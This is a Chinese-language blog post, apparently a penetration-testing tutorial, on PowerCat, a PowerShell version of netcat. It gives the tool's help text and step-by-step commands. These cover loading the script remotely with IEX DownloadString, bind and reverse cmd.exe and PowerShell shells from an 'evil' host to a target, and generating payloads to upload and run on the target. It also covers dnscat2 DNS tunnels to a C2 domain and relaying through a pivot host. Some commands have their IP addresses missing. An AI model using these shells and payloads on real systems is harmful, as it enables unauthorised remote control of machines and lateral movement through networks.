PowerCat 介绍


1 PowerCat 基础

PowerCat : nc 的 PoweShell 版本。

下载地址:GitHub - besimorhino/powercat: netshell features all in version 2 powershell

# 导入 PowerCat:
    Import-Module .\powercat.ps1
Load The Function From URL:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

# 命令选项
Usage: powercat [-c or -l] [-p port] [options]

  -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
                  If you are using -dns, specify the DNS Server to send queries to.

  -l              Listen Mode. Start a listener on the port specified by -p.

  -p  <port>      Port. The port to connect to, or the port to listen on.

  -e  <proc>      Execute. Specify the name of the process to start.

  -ep             Execute Powershell. Start a pseudo powershell session. You can
                  declare variables and execute commands, but if you try to enter
                  another shell (nslookup, netsh, cmd, etc.) the shell will hang.

  -r  <str>       Relay. Used for relaying network traffic between two nodes.
                  Client Relay Format:   -r <protocol>:<ip addr>:<port>
                  Listener Relay Format: -r <protocol>:<port>
                  DNSCat2 Relay Format:  -r dns:<dns server>:<dns port>:<domain>

  -u              UDP Mode. Send traffic over UDP. Because it's UDP, the client
                  must send data before the server can respond.

  -dns  <domain>  DNS Mode. Send traffic over the dnscat2 dns covert channel.
                  Specify the dns server to -c, the dns port to -p, and specify the
                  domain to this option, -dns. This is only a client.
                  Get the server here: https://github.com/iagox86/dnscat2

  -dnsft <int>    DNS Failure Threshold. This is how many bad packets the client can
                  recieve before exiting. Set to zero when receiving files, and set high
                  for more stability over the internet.

  -t  <int>       Timeout. The number of seconds to wait before giving up on listening or
                  connecting. Default: 60

  -i  <input>     Input. Provide data to be sent down the pipe as soon as a connection is
                  established. Used for moving files. You can provide the path to a file,
                  a byte array object, or a string. You can also pipe any of those into
                  powercat, like 'aaaaaa' | powercat -c -p 80

  -o  <type>      Output. Specify how powercat should return information to the console.
                  Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.

  -of <path>      Output File.  Specify the path to a file to write output to.

  -d              Disconnect. powercat will disconnect after the connection is established
                  and the input from -i is sent. Used for scanning.

  -rep            Repeater. powercat will continually restart after it is disconnected.
                  Used for setting up a persistent server.

  -g              Generate Payload.  Returns a script as a string which will execute the
                  powercat with the options you have specified. -i, -d, and -rep will not
                  be incorporated.

  -ge             Generate Encoded Payload. Does the same as -g, but returns a string which
                  can be executed in this way: powershell -E <encoded string>

  -h              Print this help message.


  Listen on port 8000 and print the output to the console.
      powercat -l -p 8000

  Connect to port 443, send a shell, and enable verbosity.
      powercat -c -p 443 -e cmd -v

  Connect to the dnscat2 server on c2.example.com, and send dns queries
  to the dns server on port 53.
      powercat -c -p 53 -dns c2.example.com

  Send a file to port 8000.
      powercat -c -p 8000 -i C:\inputfile

  Write the data sent to the local listener on port 4444 to C:\outfile
      powercat -l -p 4444 -of C:\outfile

  Listen on port 8000 and repeatedly server a powershell shell.
      powercat -l -p 8000 -ep -rep

  Relay traffic coming in on port 8000 over tcp to port 9000 on over tcp.
      powercat -l -p 8000 -r tcp:

  Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
  sending queries to port 53.
      powercat -l -p 8000 -r dns:

2 实验环境


3 利用 NC 正向连接 PowerCat

  • 在目标主机上执行

    powercat -l -p 8080 -e cmd.exe -v


  • 在 evil 主机上执行

    nc 8080 -v


4 利用 NC 反向连接 PowerCat

  • 在 evil 主机上执行

    nc -lp 4444 -v


  • 在目标主机上执行

    powercat -c -p 4444 -v -e cmd.exe


5 利用 PowerCat 返回 PowerShell

:返回 Poweshell 只能与 PowerShell 窗口进行交互,无法与 NC 进行交互。

  • 在 evil 主机上执行:

    powercat -l -p 4444 -v


  • 在目标主机上执行:

    powercat -c -p 4444 -v -ep


6 利用 PowerCat 生成 Payload

6.1 正向 Payload

  1. 在 evil 主机上生成Payload

    powercat -l -p 8080 -ep -v -g >> shell.ps1

    或反弹 cmd

    powercat -l -p 8080 -e cmd -v -g >> shell.ps1

  2. 将生成的 Payload 上传到目标主机上并执行

  3. 在 evil 主机上建立与目标主机的连接

    powercat -c -p 8080 -v


6.2 反向 Payload

  1. 在 evil 主机上生成Payload

    powercat -c -p 4444 -e cmd -v -g > shell.ps1

    或反弹 powershell

    powercat -c -p 4444 -ep -v -g > shell.ps1

  2. 将生成的 Payload 上传到目标主机上并执行

  3. 在 evil 主机上建立与目标主机的连接

    powercat -l -p 4444 -v


7 利用 PowerCat 进行跳板攻击

  1. 在 evil 主机上监听反向 Payload

    nc -lp 4444 -v


  2. 在目标主机上配置正向 Payload 连接

    powercat -l -p 5555 -e cmd -v


  3. 在跳板机上对流量进行转发

    powercat -c -p 4444 -r tcp: -v


posted @ 2021-10-17 22:50  f_carey  阅读(37)  评论(0编辑  收藏  举报  来源